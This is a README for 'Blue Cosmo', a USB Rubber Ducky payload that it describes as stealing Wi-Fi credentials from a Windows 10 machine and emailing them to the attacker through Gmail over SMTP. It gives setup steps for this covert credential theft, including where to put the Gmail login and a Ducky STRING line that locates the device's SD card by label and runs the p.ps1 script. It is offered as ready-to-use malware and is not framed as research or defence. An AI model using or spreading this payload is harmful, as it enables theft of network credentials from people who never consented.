Blue Cosmo
________ __ .____
\______ \ __ __ ____ | | _____.__.| | _____ ____
| | \| | \_/ ___\| |/ < | || | \__ \ / \
| ` \ | /\ \___| < \___ || |___ / __ \| | \
/_______ /____/ \___ >__|_ \/ ____||_______ (____ /___| /
\/ \/ \/\/ \/ \/ \/
A USB RubberDucky payload that steals Wi-Fi credentials and sends them to the attacker via STMP.
- Twin-Duck firmware
- Gmail account
- i suggest making a separate Gmail account for this payload
- your Gmail must have LSA Access enabled
- Windows 10 Target
Set-Up/Installation
- change Gmail credentials in p.ps1
# gmail credentials
$email = "example@gmail.com"
$password = "password"
- in line 15 of payload.txt, change 'W' to the name of your ducky [SD Card]
STRING $u=gwmi Win32_Volume|?{$_.Label -eq'W'}|select name;cd $u.name;./p.ps1;exit
- flash Twin-Duck firmware on to your duck
- load, encode, and deploy!!
- hope you enjoy the payload!!
- please subscribe to my YouTube channel :)
#projects #malware